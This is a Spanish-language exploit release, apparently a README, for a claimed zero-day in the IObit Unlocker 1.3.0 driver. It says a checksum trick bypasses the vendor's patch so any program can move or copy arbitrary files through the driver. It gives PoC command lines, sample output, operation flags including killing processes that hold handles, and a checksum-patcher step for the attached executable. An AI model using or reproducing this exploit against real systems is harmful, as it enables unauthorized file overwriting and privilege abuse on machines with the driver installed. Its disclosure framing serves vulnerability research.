
(0 day) CVE-2026-37334 Mueve o copia cualquier archivo. Omite el parche anterior con un truco de suma de comprobación. IObit Unlocker v. 1.3.0
(0 day) Mueve o copia cualquier archivo. Evita el parche anterior con un truco de suma de comprobación.
Writeup: https://nathan2.com/files/iobit.pdf Información general: https://nathan2.com/posts/iobit/
Lo descubrí sin saber que ya existía otro exploit anterior que lo había descubierto primero. Sin embargo, este evita el parche que hizo IObit. Funciona en la versión 1.3.0
Uso:
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe "C:\copied.txt" "C:\t.txt" 4 1
--- Enviando solicitud ---
Origen: C:\copied.txt
Destino: C:\t.txt
Subtipo: 4 | Banderas: 1
IOCTL exitoso. El controlador devolvió 4 bytes.
Verificación: El archivo de destino existe/es accesible.
Más banderas:
Uso: UnlockerCLI.exe <RutaOrigen> <RutaDestino> <Subtipo> <Banderas>
Ejemplo: UnlockerCLI.exe "C:\Ruta Con Espacios\archivo.txt" "C:\backup\archivo.txt" 3 (subtipo) 5 (bandera de operación)
Subtipo: (al menos los que uso) 3=mover, 4=copiar
Banderas de operación: 0=No eliminar el identificador, 1 = eliminar identificadores, 2 = terminar procesos con identificadores, 4 = terminar procesos y eliminar identificadores, 5??? experimentar.
El ejecutable adjunto debería ser funcional y ya estar parcheado. Si no, lee a continuación.
Usa el parcheador de suma de comprobación para parchear el PoC. Así:
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\checksumpatcher.exe C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe
Tamaño original del archivo: 235449 bytes
Suma alternante actual: 11044471
Suma XOR actual: 43
El archivo ya tiene las sumas de comprobación correctas. No se necesitan cambios.
Esto permitirá que el ejecutable se comunique con el controlador IObitUnlocker.